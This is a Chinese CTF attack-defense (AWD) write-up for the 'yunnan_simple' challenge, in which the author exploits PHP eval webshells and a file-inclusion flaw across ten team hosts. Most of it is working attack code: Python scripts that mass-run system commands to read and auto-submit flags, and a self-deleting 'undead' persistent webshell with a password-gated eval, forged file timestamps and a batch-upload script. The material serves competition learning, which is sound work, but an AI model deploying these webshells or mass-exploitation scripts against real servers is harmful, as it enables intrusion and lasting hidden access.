【AWD】 yunnan_simple WriteUp

本文最后更新于:2021年8月18日下午1点45分

题目环境:

靶机IP:192.168.2.146

SSH端口:2201-2210

Web端口:8801-8810

flag提交地址:192.168.2.146:8080

flag提交api:192.168.2.146:8080/flag_file.php?token=队伍token&flag=获取到的flag

D盾漏洞

image-20210613134409815

漏洞1——.a.php

漏洞详情:

1
2
<?php @eval($_REQUEST['c']);
?>

image-20210613133210570

可以看到是一句话木马。

漏洞利用:

list目录:192.168.2.146:8801/.a.php?c=system(ls);

cat flag:192.168.2.146:8801/.a.php?c=system(“cat /flag”);

image-20210613134305226

批量获取flag + 提交flag 脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 192.168.2.146:8801/.a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/.a.php'

for i in range(1 , 11):
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
print(res.text)
flag_payload = { "token" : "team1" , "flag" : res.text}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php" , params = flag_payload)

image-20210613135321940

image-20210613135712763

漏洞2——a.php

漏洞详情:

1
2
3
<?php @eval($_REQUEST['c']);
var_dump($_SERVER);
?>

image-20210613135818591

漏洞利用:

和上一个差不多,但是比上一个.a.php多了var_dump(),因此在获得flag的时候,需要做正则匹配(也可以截取字符串= =、

image-20210613135939096

批量获取flag并提交脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 192.168.2.146:8801/a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/a.php'

for i in range(1 , 11):
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞3——about.php

漏洞详情:

1
2
3
4
<?php
$file=$_GET['file'];
include $file;
?>

image-20210613140511069

很显然是一个文件包含漏洞:

image-20210613140559510

image-20210613140619309

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# http://192.168.2.146:8801/about.php?file=/flag

import requests

url1 = "http://192.168.2.146:"
url2 = '/about.php'

for i in range(1 , 11):
payload = { "file" : '/flag'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞4——config.php

image-20210613141036170

还是一句话木马

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# http://192.168.2.146:8801/config.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/config.php'

for i in range(1 , 11):
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

利用一句话木马批量上传不死马

  • PHP版本不死马:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    <?php 
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '2.php';
    $code = '<?php if(md5($_GET["pass"])=="1ac3544114c9c5e2853a183138093e5e"){@eval($_POST[coin]);} ?>';
    while (1){
    file_put_contents($file,$code);
    system('touch -m -d "2018-12-01 09:10:12" .2.php');
    usleep(5000);
    }
    ?>
  • 在hackbar中上传不死马(假设有密码c为一句话木马的密码

    其中stripslashes()为反转义函数

    1
    c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
  • 由于批量上传不死马,需要用到Python,因此对上方的PHP不死马需要进行二次转义

    1
    file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
  • 最终的python脚本

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    import time
    import requests

    url1 = "http://192.168.2.146:"

    url2 = "/.a.php" #这里的.a.php里有一句话木马 @eval($_REQUEST['c']);

    for i in range(1,11):
    print("*****************************")
    url = url1 + str(8800 + i) + url2
    hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));"
    data = {
    "c" : hack
    }
    try:
    upload_res = requests.post(url , data=data)

    except:
    continue
    else:
    print("端口号为" + str(8800 + i) + "的机器不死马上传成功" )
    requests_url = url1 + str(8800 + i) + "/bsm.php" # 访问不死马
    try:
    requests_res = requests.get(requests_url , timeout = 5)
    except:
    time.sleep(6) #程序停止6秒用于生成不死马2.php
    print("-------开始访问不死马获取flag:")
    get_flag_url = url1 + str(8800+i) + "/2.php?pass=7coin@1202"
    get_flag_data = {
    "coin" : "system(\"cat /flag\");"
    }
    get_flag_res = requests.post(get_flag_url , data=get_flag_data)
    print("端口号为"+str(8800+i)+"的机器flag为:"+get_flag_res.text[0:32])
    flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]}
    submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
    print("flag提交成功!!!!!!!!!")

其余漏洞:

image-20210615182228278